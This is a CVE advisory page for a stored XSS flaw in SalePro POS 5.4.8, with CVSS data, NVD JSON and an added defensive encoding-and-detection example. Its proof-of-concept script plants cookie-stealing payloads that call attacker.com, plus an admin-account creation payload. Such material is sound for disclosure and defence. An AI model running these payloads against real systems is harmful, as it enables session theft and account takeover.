Security Vulnerability Report
CVE-2025-56382 CVSS 6.1 MEDIUM

CVE-2025-56382

Published: 2025-10-06 18:15:51
Last Modified: 2025-10-15 18:34:36

Description

A stored Cross-site scripting (XSS) vulnerability exists in the Customer Management Module of LionCoders SalePro POS 5.4.8. An authenticated attacker can inject arbitrary web script or HTML via the 'Customer Name' parameter when creating or editing customer profiles. This malicious input is improperly sanitized before storage and subsequent rendering, leading to script execution in the browsers of users who view the affected customer details.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:lion-coders:salepro_pos:5.4.8:*:*:*:*:*:*:* - VULNERABLE
LionCoders SalePro POS < 5.4.8
LionCoders SalePro POS 5.4.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
## Stored XSS Proof of Concept for CVE-2025-56382
## Target: LionCoders SalePro POS 5.4.8 - Customer Management Module
## Vulnerability: Stored XSS via 'Customer Name' parameter

import requests

# Configuration
TARGET_URL = "http://target-salePro-pos.com"
USERNAME = "attacker_user"
PASSWORD = "attacker_password"

# Step 1: Login to the application
session = requests.Session()
login_url = f"{TARGET_URL}/login"
login_data = {
    "username": USERNAME,
    "password": PASSWORD
}
session.post(login_url, data=login_data)

# Step 2: Inject malicious JavaScript payload via Customer Name parameter
# The payload will steal session cookies and send them to attacker's server
malicious_payload = '<script>fetch("http://attacker.com/steal?cookie="+document.cookie);</script>'

customer_url = f"{TARGET_URL}/customers/create"
customer_data = {
    "customer_name": malicious_payload,
    "email": "[email protected]",
    "phone": "1234567890",
    "address": "Test Address"
}

# Step 3: Submit the malicious customer data
response = session.post(customer_url, data=customer_data)

if response.status_code == 200:
    print("[+] Malicious customer profile created successfully")
    print("[+] When an admin views this customer, the XSS payload will execute")
else:
    print(f"[-] Failed to create customer profile. Status code: {response.status_code}")

# Alternative payload examples:
# Payload 1: Cookie stealing
# <script>document.location='http://attacker.com/steal?c='+document.cookie</script>
# Payload 2: Session hijacking with image beacon
# <img src=x onerror="fetch('http://attacker.com/log?data='+btoa(document.cookie))">
# Payload 3: Admin privilege escalation attempt
# <script>fetch('/api/users/create',{method:'POST',body:JSON.stringify({username:'hacker',password:'hacked',role:'admin'}),headers:{'Content-Type':'application/json'}})</script>
```
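
Defender-side counterpart to the description and the PoC above, added here and not part of the advisory or of the vendor's code: output-encode the Customer Name field at render time (the CWE-79 fix) and, because this is a stored XSS, triage customer records already in the database for injected markup. The record layout, field names and sample rows are assumptions constructed for the example; the two flagged rows reuse payload shapes listed in the PoC.

```python
# Added example (not from the advisory or the vendor). Record layout and
# field names are assumptions; SAMPLE_CUSTOMERS is constructed test data.
import html
import re

# Constructed sample rows: legitimate names plus two payload shapes from the PoC.
SAMPLE_CUSTOMERS = [
    {"id": 1, "customer_name": "Alice O'Brien"},
    {"id": 2, "customer_name": "Bob & Co."},
    {"id": 3, "customer_name": '<script>fetch("http://attacker.com/steal?cookie="+document.cookie);</script>'},
    {"id": 4, "customer_name": '<img src=x onerror="fetch(\'http://attacker.com/log\')">'},
    {"id": 5, "customer_name": "Carol"},
]

# Markup a customer name should never carry: any HTML tag, or an on*= event handler.
_TAG_RE = re.compile(r"<\s*/?\s*[a-zA-Z][^>]*>")
_EVENT_HANDLER_RE = re.compile(r"\bon[a-zA-Z]+\s*=", re.IGNORECASE)


def render_customer_name(name: str) -> str:
    """HTML-encode a stored name for an HTML text or quoted-attribute context.

    Encoding at output time is the fix for CWE-79 here: whatever was stored,
    the browser only ever receives it as text, never as markup.
    """
    return html.escape(name, quote=True)


def find_suspicious_customer_names(records):
    """Return ids of records whose customer_name already contains markup.

    Needed after patching: the flaw is *stored* XSS, so rows written before
    the fix still carry their payload and fire on every view until cleaned.
    """
    flagged = []
    for rec in records:
        name = rec.get("customer_name", "")
        if _TAG_RE.search(name) or _EVENT_HANDLER_RE.search(name):
            flagged.append(rec["id"])
    return flagged


if __name__ == "__main__":
    # Encoded form of the stored script payload: safe to place in a template.
    print(render_customer_name(SAMPLE_CUSTOMERS[2]["customer_name"]))
    print("flagged ids:", find_suspicious_customer_names(SAMPLE_CUSTOMERS))
```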

References

https://github.com/Auspicious-Rook/Vulnerability-Research/tree/main/CVE-2025-56382 (Third Party Advisory)
https://preview.codecanyon.net/item/lims-stock-manager-pro-with-pos/full_screen_preview/22256829?_ga=2.221768668.538436323.1752589158-1013732256.1752073116 (Product)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-56382",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-06T18:15:51.407",
    "lastModified": "2025-10-15T18:34:36.293",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A stored Cross-site scripting (XSS) vulnerability exists in the Customer Management Module of LionCoders SalePro POS 5.4.8. An authenticated attacker can inject arbitrary web script or HTML via the 'Customer Name' parameter when creating or editing customer profiles. This malicious input is improperly sanitized before storage and subsequent rendering, leading to script execution in the browsers of users who view the affected customer details."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 6.1,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-79"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:lion-coders:salepro_pos:5.4.8:*:*:*:*:*:*:*",
                "matchCriteriaId": "E0947D6E-0A4E-4FAA-A872-901E0207EB48"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/Auspicious-Rook/Vulnerability-Research/tree/main/CVE-2025-56382",
        "source": "[email protected]",
        "tags": ["Third Party Advisory"]
      },
      {
        "url": "https://preview.codecanyon.net/item/lims-stock-manager-pro-with-pos/full_screen_preview/22256829?_ga=2.221768668.538436323.1752589158-1013732256.1752073116",
        "source": "[email protected]",
        "tags": ["Product"]
      }
    ]
  }
}
```